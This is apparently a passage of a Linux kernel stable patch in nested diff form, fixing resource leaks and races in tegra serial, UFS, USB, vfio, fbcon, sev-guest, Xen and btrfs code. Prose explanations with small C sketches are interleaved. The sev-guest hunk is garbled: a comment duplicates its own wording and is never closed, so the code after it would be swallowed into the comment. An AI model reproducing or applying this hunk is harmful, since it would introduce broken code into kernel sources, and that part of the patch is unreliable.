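			uts &= ~UTS_LOOP;	/* RX back on the RXD pad */
		writel(uts, uts_reg);
	}
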
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index cda9cd4fa92c8..c08360212aa20 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -1047,6 +1047,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	if (tup->cdata->fifo_mode_enable_status) {
+ 		ret = tegra_uart_wait_fifo_mode_enabled(tup);
+ 		if (ret < 0) {
++			clk_disable_unprepare(tup->uart_clk);
+ 			dev_err(tup->uport.dev,
+ 				"Failed to enable FIFO mode: %d\n", ret);
+ 			return ret;
+@@ -1068,6 +1069,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	 */
+ 	ret = tegra_set_baudrate(tup, TEGRA_UART_DEFAULT_BAUD);
+ 	if (ret < 0) {
++		clk_disable_unprepare(tup->uart_clk);
+ 		dev_err(tup->uport.dev, "Failed to set baud rate\n");
+ 		return ret;
+ 	}
+@@ -1227,10 +1229,13 @@ static int tegra_uart_startup(struct uart_port *u)
+ 				dev_name(u->dev), tup);
+ 	if (ret < 0) {
+ 		dev_err(u->dev, "Failed to register ISR for IRQ %d\n", u->irq);
+-		goto fail_hw_init;
++		goto fail_request_irq;
+ 	}
+ 	return 0;
+ 
++fail_request_irq:
++	/* tup->uart_clk is already enabled in tegra_uart_hw_init */
++	clk_disable_unprepare(tup->uart_clk);
+ fail_hw_init:
+ 	if (!tup->use_rx_pio)
+ 		tegra_uart_dma_channel_free(tup, true);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index fb5c9e2fc5348..edd34dac91b1d 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3006,6 +3006,22 @@ retry:
+ 		} else {
+ 			dev_err(hba->dev, "%s: failed to clear tag %d\n",
+ 				__func__, lrbp->task_tag);
++
++			spin_lock_irqsave(&hba->outstanding_lock, flags);
++			pending = test_bit(lrbp->task_tag,
++					   &hba->outstanding_reqs);
++			if (pending)
++				hba->dev_cmd.complete = NULL;
++			spin_unlock_irqrestore(&hba->outstanding_lock, flags);
++
++			if (!pending) {
++				/*
++				 * The completion handler ran while we tried to
++				 * clear the command.
++				 */
++				time_left = 1;
++				goto retry;
++			}
+ 		}
+ 	}
+ 
+@@ -5068,8 +5084,8 @@ static int ufshcd_slave_configure(struct scsi_device *sdev)
+ 	ufshcd_hpb_configure(hba, sdev);
+ 
+ 	blk_queue_update_dma_pad(q, PRDT_DATA_BYTE_COUNT_PAD - 1);
+-	if (hba->quirks & UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE)
+-		blk_queue_update_dma_alignment(q, PAGE_SIZE - 1);
++	if (hba->quirks & UFSHCD_QUIRK_4KB_DMA_ALIGNMENT)
++		blk_queue_update_dma_alignment(q, 4096 - 1);
+ 	/*
+ 	 * Block runtime-pm until all consumers are added.
+ 	 * Refer ufshcd_setup_links().
+diff --git a/drivers/ufs/host/ufs-exynos.c b/drivers/ufs/host/ufs-exynos.c
+index c3628a8645a56..3cdac89a28b81 100644
+--- a/drivers/ufs/host/ufs-exynos.c
++++ b/drivers/ufs/host/ufs-exynos.c
+@@ -1673,7 +1673,7 @@ static const struct exynos_ufs_drv_data exynos_ufs_drvs = {
+ 				  UFSHCD_QUIRK_BROKEN_OCS_FATAL_ERROR |
+ 				  UFSHCI_QUIRK_SKIP_MANUAL_WB_FLUSH_CTRL |
+ 				  UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING |
+-				  UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE,
++				  UFSHCD_QUIRK_4KB_DMA_ALIGNMENT,
+ 	.opts			= EXYNOS_UFS_OPT_HAS_APB_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_AUTO_CLK_CTRL |
+ 				  EXYNOS_UFS_OPT_BROKEN_RX_SEL_IDX |
+diff --git a/drivers/usb/early/xhci-dbc.c b/drivers/usb/early/xhci-dbc.c
+index bfb7e2b852996..7ef0a4b397620 100644
+--- a/drivers/usb/early/xhci-dbc.c
++++ b/drivers/usb/early/xhci-dbc.c
+@@ -874,7 +874,8 @@ retry:
+ 
+ static void early_xdbc_write(struct console *con, const char *str, u32 n)
+ {
+-	static char buf[XDBC_MAX_PACKET];
++	/* static variables are zeroed, so buf is always NULL terminated */
++	static char buf[XDBC_MAX_PACKET + 1];
+ 	int chunk, ret;
+ 	int use_cr = 0;
+ 
+diff --git a/drivers/usb/gadget/configfs.c b/drivers/usb/gadget/configfs.c
+index 7bbc776185469..4dcf29577f8f1 100644
+--- a/drivers/usb/gadget/configfs.c
++++ b/drivers/usb/gadget/configfs.c
+@@ -429,6 +429,12 @@ static int config_usb_cfg_link(
+ 	 * from another gadget or a random directory.
+ 	 * Also a function instance can only be linked once.
+ 	 */
++
++	if (gi->composite.gadget_driver.udc_name) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	list_for_each_entry(iter, &gi->available_func, cfs_list) {
+ 		if (iter != fi)
+ 			continue;
+diff --git a/drivers/usb/gadget/udc/fotg210-udc.c b/drivers/usb/gadget/udc/fotg210-udc.c
+index 693c73e5f61e8..3350b7776086a 100644
+--- a/drivers/usb/gadget/udc/fotg210-udc.c
++++ b/drivers/usb/gadget/udc/fotg210-udc.c
+@@ -706,6 +706,20 @@ static int fotg210_is_epnstall(struct fotg210_ep *ep)
+ 	return value & INOUTEPMPSR_STL_EP ? 1 : 0;
+ }
+ 
++/* For EP0 requests triggered by this driver (currently GET_STATUS response) */
++static void fotg210_ep0_complete(struct usb_ep *_ep, struct usb_request *req)
++{
++	struct fotg210_ep *ep;
++	struct fotg210_udc *fotg210;
++
++	ep = container_of(_ep, struct fotg210_ep, ep);
++	fotg210 = ep->fotg210;
++
++	if (req->status || req->actual != req->length) {
++		dev_warn(&fotg210->gadget.dev, "EP0 request failed: %d\n", req->status);
++	}
++}
++
+ static void fotg210_get_status(struct fotg210_udc *fotg210,
+ 				struct usb_ctrlrequest *ctrl)
+ {
+@@ -1171,6 +1185,8 @@ static int fotg210_udc_probe(struct platform_device *pdev)
+ 	if (fotg210->ep0_req == NULL)
+ 		goto err_map;
+ 
++	fotg210->ep0_req->complete = fotg210_ep0_complete;
++
+ 	fotg210_init(fotg210);
+ 
+ 	fotg210_disable_unplug(fotg210);
+diff --git a/drivers/usb/gadget/udc/fusb300_udc.c b/drivers/usb/gadget/udc/fusb300_udc.c
+index 5954800d652ca..08ba9c8c1e677 100644
+--- a/drivers/usb/gadget/udc/fusb300_udc.c
++++ b/drivers/usb/gadget/udc/fusb300_udc.c
+@@ -1346,6 +1346,7 @@ static int fusb300_remove(struct platform_device *pdev)
+ 	usb_del_gadget_udc(&fusb300->gadget);
+ 	iounmap(fusb300->reg);
+ 	free_irq(platform_get_irq(pdev, 0), fusb300);
++	free_irq(platform_get_irq(pdev, 1), fusb300);
+ 
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 	for (i = 0; i < FUSB300_MAX_NUM_EP; i++)
+@@ -1431,7 +1432,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 			IRQF_SHARED, udc_name, fusb300);
+ 	if (ret < 0) {
+ 		pr_err("request_irq1 error (%d)\n", ret);
+-		goto clean_up;
++		goto err_request_irq1;
+ 	}
+ 
+ 	INIT_LIST_HEAD(&fusb300->gadget.ep_list);
+@@ -1470,7 +1471,7 @@ static int fusb300_probe(struct platform_device *pdev)
+ 				GFP_KERNEL);
+ 	if (fusb300->ep0_req == NULL) {
+ 		ret = -ENOMEM;
+-		goto clean_up3;
++		goto err_alloc_request;
+ 	}
+ 
+ 	init_controller(fusb300);
+@@ -1485,7 +1486,10 @@ static int fusb300_probe(struct platform_device *pdev)
+ err_add_udc:
+ 	fusb300_free_request(&fusb300->ep[0]->ep, fusb300->ep0_req);
+ 
+-clean_up3:
++err_alloc_request:
++	free_irq(ires1->start, fusb300);
++
++err_request_irq1:
+ 	free_irq(ires->start, fusb300);
+ 
+ clean_up:
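
The fusb300 rework is the classic goto-unwind repair: give every acquisition its own label, name each label after the step that failed, and release resources in exactly the reverse order they were taken, so the IRQ requested second is also freed on both the probe error path and in remove. The skeleton, as runnable userspace C with stub acquire/release:

	#include <stdio.h>

	static int acquire(const char *what) { printf("acquire %s\n", what); return 0; }
	static void release(const char *what) { printf("release %s\n", what); }

	static int setup(void)
	{
		int ret;

		ret = acquire("irq0");
		if (ret)
			goto err_irq0;
		ret = acquire("irq1");
		if (ret)
			goto err_irq1;
		ret = acquire("ep0 request");
		if (ret)
			goto err_req;
		return 0;

	err_req:
		release("irq1");	/* undo in reverse acquisition order */
	err_irq1:
		release("irq0");
	err_irq0:
		return ret;
	}

	int main(void) { return setup(); }
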
+diff --git a/drivers/usb/host/fsl-mph-dr-of.c b/drivers/usb/host/fsl-mph-dr-of.c
+index e5df175228928..46c6a152b8655 100644
+--- a/drivers/usb/host/fsl-mph-dr-of.c
++++ b/drivers/usb/host/fsl-mph-dr-of.c
+@@ -112,8 +112,7 @@ static struct platform_device *fsl_usb2_device_register(
+ 			goto error;
+ 	}
+ 
+-	pdev->dev.of_node = ofdev->dev.of_node;
+-	pdev->dev.of_node_reused = true;
++	device_set_of_node_from_dev(&pdev->dev, &ofdev->dev);
+ 
+ 	retval = platform_device_add(pdev);
+ 	if (retval)
+diff --git a/drivers/usb/host/max3421-hcd.c b/drivers/usb/host/max3421-hcd.c
+index 352e3ac2b377b..19111e83ac131 100644
+--- a/drivers/usb/host/max3421-hcd.c
++++ b/drivers/usb/host/max3421-hcd.c
+@@ -1436,7 +1436,7 @@ max3421_spi_thread(void *dev_id)
+ 			 * use spi_wr_buf().
+ 			 */
+ 			for (i = 0; i < ARRAY_SIZE(max3421_hcd->iopins); ++i) {
+-				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1);
++				u8 val = spi_rd8(hcd, MAX3421_REG_IOPINS1 + i);
+ 
+ 				val = ((val & 0xf0) |
+ 				       (max3421_hcd->iopins[i] & 0x0f));
+diff --git a/drivers/usb/musb/mediatek.c b/drivers/usb/musb/mediatek.c
+index cad991380b0cf..27b9bd2583400 100644
+--- a/drivers/usb/musb/mediatek.c
++++ b/drivers/usb/musb/mediatek.c
+@@ -294,7 +294,8 @@ static int mtk_musb_init(struct musb *musb)
+ err_phy_power_on:
+ 	phy_exit(glue->phy);
+ err_phy_init:
+-	mtk_otg_switch_exit(glue);
++	if (musb->port_mode == MUSB_OTG)
++		mtk_otg_switch_exit(glue);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/usb/typec/mux/intel_pmc_mux.c b/drivers/usb/typec/mux/intel_pmc_mux.c
+index fdbf3694e21f4..87e2c91306070 100644
+--- a/drivers/usb/typec/mux/intel_pmc_mux.c
++++ b/drivers/usb/typec/mux/intel_pmc_mux.c
+@@ -614,8 +614,10 @@ static int pmc_usb_probe_iom(struct pmc_usb *pmc)
+ 
+ 	INIT_LIST_HEAD(&resource_list);
+ 	ret = acpi_dev_get_memory_resources(adev, &resource_list);
+-	if (ret < 0)
++	if (ret < 0) {
++		acpi_dev_put(adev);
+ 		return ret;
++	}
+ 
+ 	rentry = list_first_entry_or_null(&resource_list, struct resource_entry, node);
+ 	if (rentry)
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 2209372f236db..7fa68dc4e938a 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -100,6 +100,8 @@ struct vfio_dma {
+ 	struct task_struct	*task;
+ 	struct rb_root		pfn_list;	/* Ex-user pinned pfn list */
+ 	unsigned long		*bitmap;
++	struct mm_struct	*mm;
++	size_t			locked_vm;
+ };
+ 
+ struct vfio_batch {
+@@ -412,6 +414,19 @@ static int vfio_iova_put_vfio_pfn(struct vfio_dma *dma, struct vfio_pfn *vpfn)
+ 	return ret;
+ }
+ 
++static int mm_lock_acct(struct task_struct *task, struct mm_struct *mm,
++			bool lock_cap, long npage)
++{
++	int ret = mmap_write_lock_killable(mm);
++
++	if (ret)
++		return ret;
++
++	ret = __account_locked_vm(mm, abs(npage), npage > 0, task, lock_cap);
++	mmap_write_unlock(mm);
++	return ret;
++}
++
+ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ {
+ 	struct mm_struct *mm;
+@@ -420,16 +435,13 @@ static int vfio_lock_acct(struct vfio_dma *dma, long npage, bool async)
+ 	if (!npage)
+ 		return 0;
+ 
+-	mm = async ? get_task_mm(dma->task) : dma->task->mm;
+-	if (!mm)
++	mm = dma->mm;
++	if (async && !mmget_not_zero(mm))
+ 		return -ESRCH; /* process exited */
+ 
+-	ret = mmap_write_lock_killable(mm);
+-	if (!ret) {
+-		ret = __account_locked_vm(mm, abs(npage), npage > 0, dma->task,
+-					  dma->lock_cap);
+-		mmap_write_unlock(mm);
+-	}
++	ret = mm_lock_acct(dma->task, mm, dma->lock_cap, npage);
++	if (!ret)
++		dma->locked_vm += npage;
+ 
+ 	if (async)
+ 		mmput(mm);
+@@ -794,8 +806,8 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	struct mm_struct *mm;
+ 	int ret;
+ 
+-	mm = get_task_mm(dma->task);
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -ENODEV;
+ 
+ 	ret = vaddr_get_pfns(mm, vaddr, 1, dma->prot, pfn_base, pages);
+@@ -805,7 +817,7 @@ static int vfio_pin_page_external(struct vfio_dma *dma, unsigned long vaddr,
+ 	ret = 0;
+ 
+ 	if (do_accounting && !is_invalid_reserved_pfn(*pfn_base)) {
+-		ret = vfio_lock_acct(dma, 1, true);
++		ret = vfio_lock_acct(dma, 1, false);
+ 		if (ret) {
+ 			put_pfn(*pfn_base, dma->prot);
+ 			if (ret == -ENOMEM)
+@@ -861,6 +873,12 @@ static int vfio_iommu_type1_pin_pages(void *iommu_data,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_pin_pages not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto pin_done;
++	}
++
+ 	/*
+ 	 * Wait for all necessary vaddr's to be valid so they can be used in
+ 	 * the main loop without dropping the lock, to avoid racing vs unmap.
+@@ -1174,6 +1192,7 @@ static void vfio_remove_dma(struct vfio_iommu *iommu, struct vfio_dma *dma)
+ 	vfio_unmap_unpin(iommu, dma, true);
+ 	vfio_unlink_dma(iommu, dma);
+ 	put_task_struct(dma->task);
++	mmdrop(dma->mm);
+ 	vfio_dma_bitmap_free(dma);
+ 	if (dma->vaddr_invalid) {
+ 		iommu->vaddr_invalid_count--;
+@@ -1343,6 +1362,12 @@ static int vfio_dma_do_unmap(struct vfio_iommu *iommu,
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Cannot update vaddr if mdev is present. */
++	if (invalidate_vaddr && !list_empty(&iommu->emulated_iommu_groups)) {
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	pgshift = __ffs(iommu->pgsize_bitmap);
+ 	pgsize = (size_t)1 << pgshift;
+ 
+@@ -1566,6 +1591,38 @@ static bool vfio_iommu_iova_dma_valid(struct vfio_iommu *iommu,
+ 	return list_empty(iova);
+ }
+ 
++static int vfio_change_dma_owner(struct vfio_dma *dma)
++{
++	struct task_struct *task = current->group_leader;
++	struct mm_struct *mm = current->mm;
++	long npage = dma->locked_vm;
++	bool lock_cap;
++	int ret;
++
++	if (mm == dma->mm)
++		return 0;
++
++	lock_cap = capable(CAP_IPC_LOCK);
++	ret = mm_lock_acct(task, mm, lock_cap, npage);
++	if (ret)
++		return ret;
++
++	if (mmget_not_zero(dma->mm)) {
++		mm_lock_acct(dma->task, dma->mm, dma->lock_cap, -npage);
++		mmput(dma->mm);
++	}
++
++	if (dma->task != task) {
++		put_task_struct(dma->task);
++		dma->task = get_task_struct(task);
++	}
++	mmdrop(dma->mm);
++	dma->mm = mm;
++	mmgrab(dma->mm);
++	dma->lock_cap = lock_cap;
++	return 0;
++}
++
+ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   struct vfio_iommu_type1_dma_map *map)
+ {
+@@ -1615,6 +1672,9 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 			   dma->size != size) {
+ 			ret = -EINVAL;
+ 		} else {
++			ret = vfio_change_dma_owner(dma);
++			if (ret)
++				goto out_unlock;
+ 			dma->vaddr = vaddr;
+ 			dma->vaddr_invalid = false;
+ 			iommu->vaddr_invalid_count--;
+@@ -1652,29 +1712,15 @@ static int vfio_dma_do_map(struct vfio_iommu *iommu,
+ 	 * against the locked memory limit and we need to be able to do both
+ 	 * outside of this call path as pinning can be asynchronous via the
+ 	 * external interfaces for mdev devices.  RLIMIT_MEMLOCK requires a
+-	 * task_struct and VM locked pages requires an mm_struct, however
+-	 * holding an indefinite mm reference is not recommended, therefore we
+-	 * only hold a reference to a task.  We could hold a reference to
+-	 * current, however QEMU uses this call path through vCPU threads,
+-	 * which can be killed resulting in a NULL mm and failure in the unmap
+-	 * path when called via a different thread.  Avoid this problem by
+-	 * using the group_leader as threads within the same group require
+-	 * both CLONE_THREAD and CLONE_VM and will therefore use the same
+-	 * mm_struct.
+-	 *
+-	 * Previously we also used the task for testing CAP_IPC_LOCK at the
+-	 * time of pinning and accounting, however has_capability() makes use
+-	 * of real_cred, a copy-on-write field, so we can't guarantee that it
+-	 * matches group_leader, or in fact that it might not change by the
+-	 * time it's evaluated.  If a process were to call MAP_DMA with
+-	 * CAP_IPC_LOCK but later drop it, it doesn't make sense that they
+-	 * possibly see different results for an iommu_mapped vfio_dma vs
+-	 * externally mapped.  Therefore track CAP_IPC_LOCK in vfio_dma at the
+-	 * time of calling MAP_DMA.
++	 * task_struct. Save the group_leader so that all DMA tracking uses
++	 * the same task, to make debugging easier.  VM locked pages requires
++	 * an mm_struct, so grab the mm in case the task dies.
+ 	 */
+ 	get_task_struct(current->group_leader);
+ 	dma->task = current->group_leader;
+ 	dma->lock_cap = capable(CAP_IPC_LOCK);
++	dma->mm = current->mm;
++	mmgrab(dma->mm);
+ 
+ 	dma->pfn_list = RB_ROOT;
+ 
+@@ -2194,11 +2240,16 @@ static int vfio_iommu_type1_attach_group(void *iommu_data,
+ 	struct iommu_domain_geometry *geo;
+ 	LIST_HEAD(iova_copy);
+ 	LIST_HEAD(group_resv_regions);
+-	int ret = -EINVAL;
++	int ret = -EBUSY;
+ 
+ 	mutex_lock(&iommu->lock);
+ 
++	/* Attach could require pinning, so disallow while vaddr is invalid. */
++	if (iommu->vaddr_invalid_count)
++		goto out_unlock;
++
+ 	/* Check for duplicates */
++	ret = -EINVAL;
+ 	if (vfio_iommu_find_iommu_group(iommu, iommu_group))
+ 		goto out_unlock;
+ 
+@@ -2669,6 +2720,16 @@ static int vfio_domains_have_enforce_cache_coherency(struct vfio_iommu *iommu)
+ 	return ret;
+ }
+ 
++static bool vfio_iommu_has_emulated(struct vfio_iommu *iommu)
++{
++	bool ret;
++
++	mutex_lock(&iommu->lock);
++	ret = !list_empty(&iommu->emulated_iommu_groups);
++	mutex_unlock(&iommu->lock);
++	return ret;
++}
++
+ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 					    unsigned long arg)
+ {
+@@ -2677,8 +2738,13 @@ static int vfio_iommu_type1_check_extension(struct vfio_iommu *iommu,
+ 	case VFIO_TYPE1v2_IOMMU:
+ 	case VFIO_TYPE1_NESTING_IOMMU:
+ 	case VFIO_UNMAP_ALL:
+-	case VFIO_UPDATE_VADDR:
+ 		return 1;
++	case VFIO_UPDATE_VADDR:
++		/*
++		 * Disable this feature if mdevs are present.  They cannot
++		 * safely pin/unpin/rw while vaddrs are being updated.
++		 */
++		return iommu && !vfio_iommu_has_emulated(iommu);
+ 	case VFIO_DMA_CC_IOMMU:
+ 		if (!iommu)
+ 			return 0;
+@@ -3099,9 +3165,8 @@ static int vfio_iommu_type1_dma_rw_chunk(struct vfio_iommu *iommu,
+ 			!(dma->prot & IOMMU_READ))
+ 		return -EPERM;
+ 
+-	mm = get_task_mm(dma->task);
+-
+-	if (!mm)
++	mm = dma->mm;
++	if (!mmget_not_zero(mm))
+ 		return -EPERM;
+ 
+ 	if (kthread)
+@@ -3147,6 +3212,13 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 	size_t done;
+ 
+ 	mutex_lock(&iommu->lock);
++
++	if (WARN_ONCE(iommu->vaddr_invalid_count,
++		      "vfio_dma_rw not allowed with VFIO_UPDATE_VADDR\n")) {
++		ret = -EBUSY;
++		goto out;
++	}
++
+ 	while (count > 0) {
+ 		ret = vfio_iommu_type1_dma_rw_chunk(iommu, user_iova, data,
+ 						    count, write, &done);
+@@ -3158,6 +3230,7 @@ static int vfio_iommu_type1_dma_rw(void *iommu_data, dma_addr_t user_iova,
+ 		user_iova += done;
+ 	}
+ 
++out:
+ 	mutex_unlock(&iommu->lock);
+ 	return ret;
+ }
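
The vfio_iommu_type1 changes replace "look the mm up through the task every time" with caching dma->mm under two kinds of reference. mmgrab() pins only the mm_struct allocation, so the pointer stays valid for the life of the mapping at negligible cost; mmget_not_zero() is taken just-in-time around actual address-space work and fails cleanly once the owning process has exited. A kernel-context sketch of the scheme (tracker is an invented stand-in for vfio_dma):

	struct tracker {
		struct mm_struct *mm;
	};

	static void tracker_init(struct tracker *t)
	{
		t->mm = current->mm;
		mmgrab(t->mm);		/* cheap, never fails, pins no pages */
	}

	static int tracker_touch_memory(struct tracker *t)
	{
		if (!mmget_not_zero(t->mm))	/* process gone: refuse */
			return -ESRCH;
		/* ... use the address space (account, pin, rw) ... */
		mmput(t->mm);
		return 0;
	}

	static void tracker_fini(struct tracker *t)
	{
		mmdrop(t->mm);		/* balances mmgrab() */
	}
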
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 1b14c21af2b74..2bc8baa90c0f2 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -958,7 +958,7 @@ static const char *fbcon_startup(void)
+ 	set_blitting_type(vc, info);
+ 
+ 	/* Setup default font */
+-	if (!p->fontdata && !vc->vc_font.data) {
++	if (!p->fontdata) {
+ 		if (!fontname[0] || !(font = find_font(fontname)))
+ 			font = get_default_font(info->var.xres,
+ 						info->var.yres,
+@@ -968,8 +968,6 @@ static const char *fbcon_startup(void)
+ 		vc->vc_font.height = font->height;
+ 		vc->vc_font.data = (void *)(p->fontdata = font->data);
+ 		vc->vc_font.charcount = font->charcount;
+-	} else {
+-		p->fontdata = vc->vc_font.data;
+ 	}
+ 
+ 	cols = FBCON_SWAP(ops->rotate, info->var.xres, info->var.yres);
+@@ -1135,9 +1133,9 @@ static void fbcon_init(struct vc_data *vc, int init)
+ 	ops->p = &fb_display[fg_console];
+ }
+ 
+-static void fbcon_free_font(struct fbcon_display *p, bool freefont)
++static void fbcon_free_font(struct fbcon_display *p)
+ {
+-	if (freefont && p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
++	if (p->userfont && p->fontdata && (--REFCOUNT(p->fontdata) == 0))
+ 		kfree(p->fontdata - FONT_EXTRA_WORDS * sizeof(int));
+ 	p->fontdata = NULL;
+ 	p->userfont = 0;
+@@ -1172,8 +1170,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	struct fb_info *info;
+ 	struct fbcon_ops *ops;
+ 	int idx;
+-	bool free_font = true;
+ 
++	fbcon_free_font(p);
+ 	idx = con2fb_map[vc->vc_num];
+ 
+ 	if (idx == -1)
+@@ -1184,8 +1182,6 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	if (!info)
+ 		goto finished;
+ 
+-	if (info->flags & FBINFO_MISC_FIRMWARE)
+-		free_font = false;
+ 	ops = info->fbcon_par;
+ 
+ 	if (!ops)
+@@ -1197,9 +1193,8 @@ static void fbcon_deinit(struct vc_data *vc)
+ 	ops->initialized = false;
+ finished:
+ 
+-	fbcon_free_font(p, free_font);
+-	if (free_font)
+-		vc->vc_font.data = NULL;
++	fbcon_free_font(p);
++	vc->vc_font.data = NULL;
+ 
+ 	if (vc->vc_hi_font_mask && vc->vc_screenbuf)
+ 		set_vc_hi_font(vc, false);
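
The fbcon hunks drop the freefont parameter and the FBINFO_MISC_FIRMWARE special case, so a display's font is now freed purely by reference count. The last-reference-frees rule it leans on, as a minimal userspace sketch (names hypothetical; the kernel's REFCOUNT() macro is simplified to a plain counter):

    #include <stdlib.h>

    struct userfont {
    	int refcount;
    	unsigned char *data;
    };

    /* Free the payload only when the last user drops its reference. */
    static void font_put(struct userfont *f)
    {
    	if (f->data && --f->refcount == 0)
    		free(f->data);
    	f->data = NULL;	/* the caller's pointer is dead either way */
    }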
+diff --git a/drivers/virt/coco/sev-guest/sev-guest.c b/drivers/virt/coco/sev-guest/sev-guest.c
+index 99d6062afe72f..6de888bce1bb1 100644
+--- a/drivers/virt/coco/sev-guest/sev-guest.c
++++ b/drivers/virt/coco/sev-guest/sev-guest.c
+@@ -379,9 +379,26 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		snp_dev->input.data_npages = certs_npages;
+ 	}
+ 
++	/*
++	 * Increment the message sequence number. There is no harm in doing
++	 * this now because decryption uses the value stored in the response
++	 * structure and any failure will wipe the VMPCK, preventing further
++	 * use anyway.
++	 */
++	snp_inc_msg_seqno(snp_dev);
++
+ 	if (fw_err)
+ 		*fw_err = err;
+ 
++	/*
++	 * If an extended guest request was issued and the supplied certificate
++	 * buffer was not large enough, a standard guest request was issued to
++	 * prevent IV reuse. If the standard request was successful, return -EIO
++	 * prevent IV reuse.  If the standard request was successful, return
++	 * -EIO to the caller, as the extended request originally would have.
++	if (!rc && err == SNP_GUEST_REQ_INVALID_LEN)
++		return -EIO;
++
+ 	if (rc) {
+ 		dev_alert(snp_dev->dev,
+ 			  "Detected error from ASP request. rc: %d, fw_err: %llu\n",
+@@ -397,9 +414,6 @@ static int handle_guest_request(struct snp_guest_dev *snp_dev, u64 exit_code, in
+ 		goto disable_vmpck;
+ 	}
+ 
+-	/* Increment to new message sequence after payload decryption was successful. */
+-	snp_inc_msg_seqno(snp_dev);
+-
+ 	return 0;
+ 
+ disable_vmpck:
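
The sev-guest reordering makes the sequence-number bump unconditional: the number feeds the AEAD IV, so once the firmware may have consumed a value it must be retired even if the request is ultimately reported as failed. A minimal sketch of that discipline; the += 2 step mirrors my reading of the driver's snp_inc_msg_seqno(), which retires the request and response values together, so treat it as an assumption:

    #include <stdint.h>

    struct guest_ctx {
    	uint64_t msg_seqno;	/* next unused value; never rolled back */
    };

    /* Hand out a sequence number and immediately retire it and its response
     * counterpart, even if the exchange later fails at a higher level. */
    static uint64_t claim_seqno(struct guest_ctx *c)
    {
    	uint64_t seq = c->msg_seqno;

    	c->msg_seqno += 2;
    	return seq;
    }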
+diff --git a/drivers/xen/grant-dma-iommu.c b/drivers/xen/grant-dma-iommu.c
+index 16b8bc0c0b33d..6a9fe02c6bfcc 100644
+--- a/drivers/xen/grant-dma-iommu.c
++++ b/drivers/xen/grant-dma-iommu.c
+@@ -16,8 +16,15 @@ struct grant_dma_iommu_device {
+ 	struct iommu_device iommu;
+ };
+ 
+-/* Nothing is really needed here */
+-static const struct iommu_ops grant_dma_iommu_ops;
++static struct iommu_device *grant_dma_iommu_probe_device(struct device *dev)
++{
++	return ERR_PTR(-ENODEV);
++}
++
++/* Nothing is really needed here except a dummy probe_device callback */
++static const struct iommu_ops grant_dma_iommu_ops = {
++	.probe_device = grant_dma_iommu_probe_device,
++};
+ 
+ static const struct of_device_id grant_dma_iommu_of_match[] = {
+ 	{ .compatible = "xen,grant-dma" },
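
The grant-dma-iommu stub works because the IOMMU core distinguishes error pointers from real devices: returning ERR_PTR(-ENODEV) from probe_device opts every device out while still giving the core a callback to invoke. For reference, simplified stand-ins for the kernel's ERR_PTR()/IS_ERR() helpers (the real definitions live in include/linux/err.h):

    #include <stdint.h>

    /* Small negative errnos are smuggled through the top of the pointer range. */
    #define MAX_ERRNO	4095

    static inline void *ERR_PTR(long error)
    {
    	return (void *)error;
    }

    static inline int IS_ERR(const void *ptr)
    {
    	return (uintptr_t)ptr >= (uintptr_t)-MAX_ERRNO;
    }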
+diff --git a/fs/btrfs/discard.c b/fs/btrfs/discard.c
+index e1b7bd927d691..bd9dde374e5d8 100644
+--- a/fs/btrfs/discard.c
++++ b/fs/btrfs/discard.c
+@@ -77,6 +77,7 @@ static struct list_head *get_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 				  struct btrfs_block_group *block_group)
+ {
++	lockdep_assert_held(&discard_ctl->lock);
+ 	if (!btrfs_run_discard_work(discard_ctl))
+ 		return;
+ 
+@@ -88,6 +89,8 @@ static void __add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ 						      BTRFS_DISCARD_DELAY);
+ 		block_group->discard_state = BTRFS_DISCARD_RESET_CURSOR;
+ 	}
++	if (list_empty(&block_group->discard_list))
++		btrfs_get_block_group(block_group);
+ 
+ 	list_move_tail(&block_group->discard_list,
+ 		       get_discard_list(discard_ctl, block_group));
+@@ -107,8 +110,12 @@ static void add_to_discard_list(struct btrfs_discard_ctl *discard_ctl,
+ static void add_to_discard_unused_list(struct btrfs_discard_ctl *discard_ctl,
